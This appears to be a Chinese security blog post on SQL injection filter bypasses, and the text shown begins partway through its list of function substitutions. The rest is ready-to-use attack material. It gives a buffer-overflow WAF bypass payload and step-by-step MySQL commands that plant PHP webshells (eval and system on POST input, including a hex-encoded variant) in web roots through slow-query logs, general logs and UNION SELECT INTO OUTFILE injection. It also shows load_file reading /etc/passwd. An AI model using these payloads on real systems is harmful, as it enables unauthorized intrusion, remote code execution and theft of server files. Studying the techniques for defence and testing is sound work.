<h3 id="2）ascii-–-hex-、bin-，替代之后再使用对应的进制转string即可"><a href="#2）ascii-–-hex-、bin-，替代之后再使用对应的进制转string即可" class="headerlink" title="2）ascii()–&gt;hex()、bin()，替代之后再使用对应的进制转string即可"></a>2）ascii()–&gt;hex()、bin()，替代之后再使用对应的进制转string即可</h3><h3 id="3）group-concat-–-concat-ws-，第一个参数为分隔符"><a href="#3）group-concat-–-concat-ws-，第一个参数为分隔符" class="headerlink" title="3）group_concat()–&gt;concat_ws()，第一个参数为分隔符"></a>3）group_concat()–&gt;concat_ws()，第一个参数为分隔符</h3><p>eg：<code>mysql&gt; select concat_ws(&quot;,&quot;,&quot;str1&quot;,&quot;str2&quot;)</code></p>
<h3 id="4）substr-substring-mid-可以相互取代-取子串的函数还有left-right"><a href="#4）substr-substring-mid-可以相互取代-取子串的函数还有left-right" class="headerlink" title="4）substr(),substring(),mid()可以相互取代, 取子串的函数还有left(),right()"></a>4）substr(),substring(),mid()可以相互取代, 取子串的函数还有left(),right()</h3><h3 id="5）user-–-user、datadir–-datadir"><a href="#5）user-–-user、datadir–-datadir" class="headerlink" title="5）user() –&gt; @@user、datadir–&gt;@@datadir"></a>5）user() –&gt; @@user、datadir–&gt;@@datadir</h3><h3 id="6）ord-–-ascii-这两个函数在处理英文时效果一样，但是处理中文等时不一致"><a href="#6）ord-–-ascii-这两个函数在处理英文时效果一样，但是处理中文等时不一致" class="headerlink" title="6）ord()–&gt;ascii():这两个函数在处理英文时效果一样，但是处理中文等时不一致"></a>6）ord()–&gt;ascii():这两个函数在处理英文时效果一样，但是处理中文等时不一致</h3><h2 id="13-缓冲区溢出"><a href="#13-缓冲区溢出" class="headerlink" title="13.缓冲区溢出"></a>13.缓冲区溢出</h2><p>缓冲区溢出用于对付WAF，有不少WAF是C语言写的，而C语言自身没有缓冲区保护机制，因此如果WAF在处理测试向量时超出了其缓冲区长度，就会引发bug从而实现绕过</p>
<p>eg：</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26</span><br></pre></td></tr></table></figure></div>


<p>示例0xA*1000指0xA后面”A”重复1000次，一般来说对应用软件构成缓冲区溢出都需要较大的测试长度，这里1000只做参考，在某些情况下可能不需要这么长也能溢出</p>
<p>原文链接：<a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/zkaqlaoniao/article/details/120948100" >https://blog.csdn.net/zkaqlaoniao/article/details/120948100<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p>
<h2 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h2><p>sql查询语句是能够写入文件的，前提是<code>secure_file_priv</code>&#x3D;’’（为空）</p>
<p>同时需要你有写入的权限，并且数据库中没有这个文件(不支持覆盖文件)，此时就可以写入了</p>
<p>语句如下</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT &#x27;Hello, World!&#x27; INTO OUTFILE &#x27;/path/to/file.txt&#x27;;</span><br></pre></td></tr></table></figure></div>

<p>这就是一个简单的写文件语句，可以看到最核心的点就是INTO OUTFILE，是可以写文件到某个特定的目录</p>
<h3 id="写木马到网站根目录"><a href="#写木马到网站根目录" class="headerlink" title="写木马到网站根目录"></a>写木马到网站根目录</h3><p>那么很容易理解第一个getshell的方法就是<strong>写木马文件到网站根目录</strong></p>
<h3 id="写木马到日志文件"><a href="#写木马到日志文件" class="headerlink" title="写木马到日志文件"></a>写木马到日志文件</h3><h4 id="慢查询日志参数修改getshell"><a href="#慢查询日志参数修改getshell" class="headerlink" title="慢查询日志参数修改getshell"></a>慢查询日志参数修改getshell</h4><p>然后就是<strong>慢查询日志参数修改getshell</strong></p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#x27;%slow%&#x27; # 查看所有慢查询相关的参数  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">set global slow_query_log=1 		# 打开慢日志</span><br><span class="line"></span><br><span class="line">set global slow_query_log_file=&#x27;C:\\phpStudy\\WWW\\test.php&#x27;	# 指定慢查询日志的路径为 Web 根目录下的 `test.php`，且路径写法必须是 **双反斜杠**，是 Windows 下文件路径要求。 </span><br><span class="line"></span><br><span class="line">SELECT &#x27;&lt;?php @eval($_POST[1]);?&gt;&#x27; or sleep(11)		# 这儿11是超过慢日志的10秒时间</span><br></pre></td></tr></table></figure></div>

<p>这个原理就是利用超时来吧木马写入我们自己指定路径的慢查询日志文件</p>
<h4 id="general-log来getshell"><a href="#general-log来getshell" class="headerlink" title="general_log来getshell"></a>general_log来getshell</h4><p>利用普通查询日志也能进行</p>
<p>相关参数一共有3个：general_log、log_output、general_log_file</p>
<h6 id="1-确保日志开启"><a href="#1-确保日志开启" class="headerlink" title="1.确保日志开启"></a>1.确保日志开启</h6><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">show variables like &#x27;general_log&#x27;;   # 查看日志是否开启</span><br><span class="line"></span><br><span class="line">set global general_log=on;   # 开启日志功能， MySQL 把执行的 SQL 语句全部记录下来</span><br></pre></td></tr></table></figure></div>

<h6 id="2-确定日志位置"><a href="#2-确定日志位置" class="headerlink" title="2.确定日志位置"></a>2.确定日志位置</h6><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">show variables like &#x27;general_log_file&#x27;;    # 看看日志文件保存位置</span><br><span class="line"></span><br><span class="line">set global general_log_file=&#x27;C:/phpStudy/WWW/shell.php&#x27;;   # 设置日志文件保存位置</span><br></pre></td></tr></table></figure></div>

<h6 id="3-确保日志写入的是文件，而不是表"><a href="#3-确保日志写入的是文件，而不是表" class="headerlink" title="3.确保日志写入的是文件，而不是表"></a>3.确保日志写入的是文件，而不是表</h6><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">show variables like &#x27;log_output&#x27;;  -- 看看日志输出类型  table或file</span><br><span class="line"></span><br><span class="line">set global log_output=&#x27;table&#x27;; -- 设置输出类型为 table</span><br><span class="line"></span><br><span class="line">set global log_output=&#x27;file&#x27;;   -- 设置输出类型为file</span><br><span class="line"></span><br><span class="line">一般log_output都是file,就是将日志存入文件中。table的话就是将日志存入数据库的日志表中。</span><br></pre></td></tr></table></figure></div>

<h6 id="4-写入木马"><a href="#4-写入木马" class="headerlink" title="4.写入木马"></a>4.写入木马</h6><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">set global general_log=&#x27;on&#x27;;</span><br><span class="line"></span><br><span class="line">set global general_log_file=&#x27;C:/phpStudy/WWW/shell.php&#x27;</span><br><span class="line"></span><br><span class="line">select &#x27;&lt;?php @eval($_POST[&#x27;pwd&#x27;]);?&gt;&#x27;;</span><br></pre></td></tr></table></figure></div>

<h4 id="into-outfile方法getshell"><a href="#into-outfile方法getshell" class="headerlink" title="into outfile方法getshell"></a>into outfile方法getshell</h4><p>相比于日志写shell，这个还需清楚网站的根目录</p>
<p>1.收集信息，得到注入语句</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">email=admin&#x27;			    #(报错)</span><br><span class="line"></span><br><span class="line">email=admin&#x27; #  			#(不报错)</span><br><span class="line"></span><br><span class="line">email=admin&#x27; or &#x27;1&#x27; #		# 成功登入</span><br><span class="line"></span><br><span class="line">email=admin&#x27; union select 1,2,3,4,5,6,7,8 #</span><br><span class="line"></span><br><span class="line">email=admin&#x27; union select 1,2,3,4,5,6,7,8,9 #</span><br><span class="line"></span><br><span class="line">email=admin&#x27; union select 1,2,3,database(),5,6,7,8 #</span><br><span class="line"></span><br><span class="line">email=admin&#x27; union select 1,2,3,user(),5,6,7,8 #</span><br><span class="line"></span><br><span class="line">email=admin&#x27; union select 1,2,3,@@version,5,6,7,8 #</span><br></pre></td></tr></table></figure></div>

<h6 id="2-写入木马"><a href="#2-写入木马" class="headerlink" title="2. 写入木马"></a>2. 写入木马</h6><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">email=admin&#x27; union select 1,2,3,load_file(&#x27;/etc/passwd&#x27;),5,6,7,8 #证明 有 `FILE` 权限 ，否则 INTO OUTFILE，load_file() 会报错  </span><br><span class="line"></span><br><span class="line">email=admin&#x27; union select 1,2,3,&quot;&lt;?php system($_POST[&#x27;x&#x27;]);?&gt;&quot;,5,6,7,8 into outfile &#x27;/var/www/sqli_shell.php&#x27;#</span><br><span class="line"></span><br><span class="line">或者</span><br><span class="line"></span><br><span class="line">union select 1,2,3,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e,5,6,7,8  into outfile &#x27;/var/www/html/shell.php&#x27; #</span><br><span class="line"></span><br><span class="line">email=admin&#x27; union select 1,2,3,load_file(&#x27;/var/www/sqli_shell.php&#x27;),5,6,7,8 #</span><br></pre></td></tr></table></figure></div>
		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> sql注入绕过姿势</li>
        <li><strong>作者:</strong> kivvs</li>
        <li><strong>创建于
                :</strong> 2026-08-14 22:56:13</li>
        
            <li>
                <strong>更新于
                    :</strong> 2026-08-14 22:57:16
            </li>
        
        <li>
            <strong>链接:</strong> https://kivvs.github.io/2026/08/14/sql注入绕过姿势/
        </li>
        <li>
            <strong>
                版权声明:
            </strong>
            

            
                本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a> 进行许可。
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/web/">#web</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/SQL/">#SQL</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2026/08/14/%E5%88%9D%E5%AD%A6xss/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">初学xss</span>
						<span class="post-nav-item">上一篇</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2026/08/14/sql%E5%AD%A6%E4%B9%A0%E6%A6%82%E8%A6%81/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">sql学习概要</span>
						<span class="post-nav-item">下一篇</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        评论
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.js';

      (function() {
        const startPath = location.pathname;
        const startTime = Date.now();
        const retryDelay = 200;
        const retryLimit = 5000;

        const runWaline = () => {
          if (location.pathname !== startPath) {
            return;
          }

          const container = document.getElementById('waline');
          if (!container) {
            if (Date.now() - startTime < retryLimit) {
              setTimeout(runWaline, retryDelay);
            }
            return;
          }

          if (window.redefineWalineInstance?.destroy) {
            window.redefineWalineInstance.destroy();
          }

          container.innerHTML = '';
          window.redefineWalineInstance = init({
            el: '#waline',
            serverURL: 'https://example.example.com',
            path: location.pathname,
            dark: 'body[class~="dark-mode"]',
            reaction: false,
            requiredMeta: ['nick', 'mail'],
            emoji: [],
                      lang: 'zh-CN',
          });
        };

        runWaline();
      })();
    </script>



        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">目录</div>
		<div class="page-title">sql注入绕过姿势</div>
		<ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E6%B3%A8%E9%87%8A%E7%AC%A6%E7%BB%95%E8%BF%87"><span class="nav-text">1.注释符绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-text">2.大小写绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E5%86%85%E8%81%94%E6%B3%A8%E9%87%8A%E7%BB%95%E8%BF%87"><span class="nav-text">3.内联注释绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-%E5%8F%8C%E5%86%99%E5%85%B3%E9%94%AE%E5%AD%97%E7%BB%95%E8%BF%87"><span class="nav-text">4.双写关键字绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-%E7%89%B9%E6%AE%8A%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="nav-text">5.特殊编码绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%EF%BC%89%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E7%BB%95%E8%BF%87"><span class="nav-text">1）十六进制绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%EF%BC%89ascii%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="nav-text">2）ascii编码绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%EF%BC%89Unicode%E7%BC%96%E7%A0%81"><span class="nav-text">3）Unicode编码</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-%E7%A9%BA%E6%A0%BC%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-text">6.空格过滤绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7-%E8%BF%87%E6%BB%A4or-and-xor-%E5%BC%82%E6%88%96-not-%E7%BB%95%E8%BF%87"><span class="nav-text">7.过滤or and xor(异或) not 绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#8-%E8%BF%87%E6%BB%A4%E7%AD%89%E5%8F%B7-%E7%BB%95%E8%BF%87"><span class="nav-text">8.过滤等号&#x3D;绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%EF%BC%89%E4%B8%8D%E5%8A%A0%E9%80%9A%E9%85%8D%E7%AC%A6%E7%9A%84like%E6%89%A7%E8%A1%8C%E7%9A%84%E6%95%88%E6%9E%9C%E5%92%8C-%E4%B8%80%E8%87%B4%EF%BC%8C%E6%89%80%E4%BB%A5%E5%8F%AF%E4%BB%A5%E7%94%A8%E6%9D%A5%E7%BB%95%E8%BF%87%E3%80%82"><span class="nav-text">1）不加通配符的like执行的效果和&#x3D;一致，所以可以用来绕过。</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%EF%BC%89rlike-%E6%A8%A1%E7%B3%8A%E5%8C%B9%E9%85%8D%EF%BC%8C%E5%8F%AA%E8%A6%81%E5%AD%97%E6%AE%B5%E7%9A%84%E5%80%BC%E4%B8%AD%E5%AD%98%E5%9C%A8%E8%A6%81%E6%9F%A5%E6%89%BE%E7%9A%84-%E9%83%A8%E5%88%86-%E5%B0%B1%E4%BC%9A%E8%A2%AB%E9%80%89%E6%8B%A9%E5%87%BA%E6%9D%A5%EF%BC%8C%E7%94%A8%E6%9D%A5%E5%8F%96%E4%BB%A3-%E6%97%B6%EF%BC%8Crlike%E7%9A%84%E7%94%A8%E6%B3%95%E5%92%8C%E4%B8%8A%E9%9D%A2%E7%9A%84like%E4%B8%80%E6%A0%B7%EF%BC%8C%E6%B2%A1%E6%9C%89%E9%80%9A%E9%85%8D%E7%AC%A6%E6%95%88%E6%9E%9C%E5%92%8C-%E4%B8%80%E6%A0%B7"><span class="nav-text">2）rlike:模糊匹配，只要字段的值中存在要查找的 部分 就会被选择出来，用来取代&#x3D;时，rlike的用法和上面的like一样，没有通配符效果和&#x3D;一样</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%EF%BC%89regexp-MySQL%E4%B8%AD%E4%BD%BF%E7%94%A8-REGEXP-%E6%93%8D%E4%BD%9C%E7%AC%A6%E6%9D%A5%E8%BF%9B%E8%A1%8C%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%E5%8C%B9%E9%85%8D"><span class="nav-text">3）regexp:MySQL中使用 REGEXP 操作符来进行正则表达式匹配</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4%EF%BC%89%E4%BD%BF%E7%94%A8%E5%A4%A7%E5%B0%8F%E4%BA%8E%E5%8F%B7%E6%9D%A5%E7%BB%95%E8%BF%87"><span class="nav-text">4）使用大小于号来绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5%EF%BC%89-%E7%AD%89%E4%BB%B7%E4%BA%8E-%EF%BC%8C%E6%89%80%E4%BB%A5%E5%9C%A8%E5%89%8D%E9%9D%A2%E5%86%8D%E5%8A%A0%E4%B8%80%E4%B8%AA-%E7%BB%93%E6%9E%9C%E5%B0%B1%E6%98%AF%E7%AD%89%E5%8F%B7%E4%BA%86"><span class="nav-text">5）&lt;&gt; 等价于 !&#x3D;，所以在前面再加一个!结果就是等号了</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#9-%E8%BF%87%E6%BB%A4%E5%A4%A7%E5%B0%8F%E4%BA%8E%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-text">9.过滤大小于号绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%EF%BC%89greatest-n1-n2-n3%E2%80%A6-%E8%BF%94%E5%9B%9En%E4%B8%AD%E7%9A%84%E6%9C%80%E5%A4%A7%E5%80%BC"><span class="nav-text">1）greatest(n1, n2, n3…):返回n中的最大值</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%EF%BC%89least-n1-n2-n3%E2%80%A6-%E8%BF%94%E5%9B%9En%E4%B8%AD%E7%9A%84%E6%9C%80%E5%B0%8F%E5%80%BC%EF%BC%8C%E4%B8%8E%E4%B8%8A%E5%90%8C%E7%90%86%E3%80%82"><span class="nav-text">2）least(n1,n2,n3…):返回n中的最小值，与上同理。</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%EF%BC%89strcmp-str1-str2-%E8%8B%A5%E6%89%80%E6%9C%89%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9D%87%E7%9B%B8%E5%90%8C%EF%BC%8C%E5%88%99%E8%BF%94%E5%9B%9E0%EF%BC%8C%E8%8B%A5%E6%A0%B9%E6%8D%AE%E5%BD%93%E5%89%8D%E5%88%86%E7%B1%BB%E6%AC%A1%E5%BA%8F%EF%BC%8C%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%8F%82%E6%95%B0%E5%B0%8F%E4%BA%8E%E7%AC%AC%E4%BA%8C%E4%B8%AA%EF%BC%8C%E5%88%99%E8%BF%94%E5%9B%9E-1%EF%BC%8C%E5%85%B6%E5%AE%83%E6%83%85%E5%86%B5%E8%BF%94%E5%9B%9E-1"><span class="nav-text">3）strcmp(str1,str2):若所有的字符串均相同，则返回0，若根据当前分类次序，第一个参数小于第二个，则返回 -1，其它情况返回 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4%EF%BC%89in%E5%85%B3%E9%94%AE%E5%AD%97"><span class="nav-text">4）in关键字</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5%EF%BC%89between-a-and-b-%E8%8C%83%E5%9B%B4%E5%9C%A8a-b%E4%B9%8B%E9%97%B4%EF%BC%8C%E5%8C%85%E6%8B%ACa%E3%80%81b%E3%80%82"><span class="nav-text">5）between a and b:范围在a-b之间，包括a、b。</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#10%E8%BF%87%E6%BB%A4%E5%BC%95%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-text">10过滤引号绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%EF%BC%89%E4%BD%BF%E7%94%A8%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6"><span class="nav-text">1）使用十六进制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%EF%BC%89%E5%AE%BD%E5%AD%97%E8%8A%82%EF%BC%8C%E5%B8%B8%E7%94%A8%E5%9C%A8web%E5%BA%94%E7%94%A8%E4%BD%BF%E7%94%A8%E7%9A%84%E5%AD%97%E7%AC%A6%E9%9B%86%E4%B8%BAGBK%E6%97%B6%EF%BC%8C%E5%B9%B6%E4%B8%94%E8%BF%87%E6%BB%A4%E4%BA%86%E5%BC%95%E5%8F%B7%EF%BC%8C%E5%B0%B1%E5%8F%AF%E4%BB%A5%E8%AF%95%E8%AF%95%E5%AE%BD%E5%AD%97%E8%8A%82%E3%80%82-27%E8%A1%A8%E7%A4%BA-%E2%80%98-%E5%8D%95%E5%BC%95%E5%8F%B7-%EF%BC%8C%E5%8D%95%E5%BC%95%E5%8F%B7%E4%BC%9A%E8%A2%AB%E8%BD%AC%E4%B9%89%E6%88%90"><span class="nav-text">2）宽字节，常用在web应用使用的字符集为GBK时，并且过滤了引号，就可以试试宽字节。%27表示 ‘(单引号)，单引号会被转义成&#39;</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#11-%E8%BF%87%E6%BB%A4%E9%80%97%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-text">11.过滤逗号绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%EF%BC%89%E5%A6%82%E6%9E%9Cwaf%E8%BF%87%E6%BB%A4%E4%BA%86%E9%80%97%E5%8F%B7%EF%BC%8C%E5%B9%B6%E4%B8%94%E5%8F%AA%E8%83%BD%E7%9B%B2%E6%B3%A8%EF%BC%8C%E5%9C%A8%E5%8F%96%E5%AD%90%E4%B8%B2%E7%9A%84%E5%87%A0%E4%B8%AA%E5%87%BD%E6%95%B0%E4%B8%AD%EF%BC%8C%E6%9C%89%E4%B8%80%E4%B8%AA%E6%9B%BF%E4%BB%A3%E9%80%97%E5%8F%B7%E7%9A%84%E6%96%B9%E6%B3%95%E5%B0%B1%E6%98%AF%E4%BD%BF%E7%94%A8from-pos-for-len%EF%BC%8C%E5%85%B6%E4%B8%ADpos%E4%BB%A3%E8%A1%A8%E4%BB%8Epos%E4%B8%AA%E5%BC%80%E5%A7%8B%E8%AF%BB%E5%8F%96len%E9%95%BF%E5%BA%A6%E7%9A%84%E5%AD%90%E4%B8%B2"><span class="nav-text">1）如果waf过滤了逗号，并且只能盲注，在取子串的几个函数中，有一个替代逗号的方法就是使用from pos for len，其中pos代表从pos个开始读取len长度的子串</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%EF%BC%89%E4%B9%9F%E5%8F%AF%E4%BD%BF%E7%94%A8join%E5%85%B3%E9%94%AE%E5%AD%97%E6%9D%A5%E7%BB%95%E8%BF%87"><span class="nav-text">2）也可使用join关键字来绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%EF%BC%89%E4%BD%BF%E7%94%A8like%E5%85%B3%E9%94%AE%E5%AD%97%EF%BC%8C%E9%80%82%E7%94%A8%E4%BA%8Esubstr-%E7%AD%89%E6%8F%90%E5%8F%96%E5%AD%90%E4%B8%B2%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%AD%E7%9A%84%E9%80%97%E5%8F%B7"><span class="nav-text">3）使用like关键字，适用于substr()等提取子串的函数中的逗号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5%EF%BC%89%E4%BD%BF%E7%94%A8offset%E5%85%B3%E9%94%AE%E5%AD%97%EF%BC%8C%E9%80%82%E7%94%A8%E4%BA%8Elimit%E4%B8%AD%E7%9A%84%E9%80%97%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4%E7%9A%84%E6%83%85%E5%86%B5%EF%BC%8Climit-2-1%E7%AD%89%E4%BB%B7%E4%BA%8Elimit-1-offset-2"><span class="nav-text">5）使用offset关键字，适用于limit中的逗号被过滤的情况，limit 2,1等价于limit 1 offset 2</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#12-%E8%BF%87%E6%BB%A4%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87"><span class="nav-text">12.过滤函数绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%EF%BC%89sleep-%E2%80%93-benchmark"><span class="nav-text">1）sleep() –&gt;benchmark()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%EF%BC%89ascii-%E2%80%93-hex-%E3%80%81bin-%EF%BC%8C%E6%9B%BF%E4%BB%A3%E4%B9%8B%E5%90%8E%E5%86%8D%E4%BD%BF%E7%94%A8%E5%AF%B9%E5%BA%94%E7%9A%84%E8%BF%9B%E5%88%B6%E8%BD%ACstring%E5%8D%B3%E5%8F%AF"><span class="nav-text">2）ascii()–&gt;hex()、bin()，替代之后再使用对应的进制转string即可</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%EF%BC%89group-concat-%E2%80%93-concat-ws-%EF%BC%8C%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%8F%82%E6%95%B0%E4%B8%BA%E5%88%86%E9%9A%94%E7%AC%A6"><span class="nav-text">3）group_concat()–&gt;concat_ws()，第一个参数为分隔符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4%EF%BC%89substr-substring-mid-%E5%8F%AF%E4%BB%A5%E7%9B%B8%E4%BA%92%E5%8F%96%E4%BB%A3-%E5%8F%96%E5%AD%90%E4%B8%B2%E7%9A%84%E5%87%BD%E6%95%B0%E8%BF%98%E6%9C%89left-right"><span class="nav-text">4）substr(),substring(),mid()可以相互取代, 取子串的函数还有left(),right()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5%EF%BC%89user-%E2%80%93-user%E3%80%81datadir%E2%80%93-datadir"><span class="nav-text">5）user() –&gt; @@user、datadir–&gt;@@datadir</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6%EF%BC%89ord-%E2%80%93-ascii-%E8%BF%99%E4%B8%A4%E4%B8%AA%E5%87%BD%E6%95%B0%E5%9C%A8%E5%A4%84%E7%90%86%E8%8B%B1%E6%96%87%E6%97%B6%E6%95%88%E6%9E%9C%E4%B8%80%E6%A0%B7%EF%BC%8C%E4%BD%86%E6%98%AF%E5%A4%84%E7%90%86%E4%B8%AD%E6%96%87%E7%AD%89%E6%97%B6%E4%B8%8D%E4%B8%80%E8%87%B4"><span class="nav-text">6）ord()–&gt;ascii():这两个函数在处理英文时效果一样，但是处理中文等时不一致</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#13-%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA"><span class="nav-text">13.缓冲区溢出</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#getshell"><span class="nav-text">getshell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%99%E6%9C%A8%E9%A9%AC%E5%88%B0%E7%BD%91%E7%AB%99%E6%A0%B9%E7%9B%AE%E5%BD%95"><span class="nav-text">写木马到网站根目录</span></a></li><li 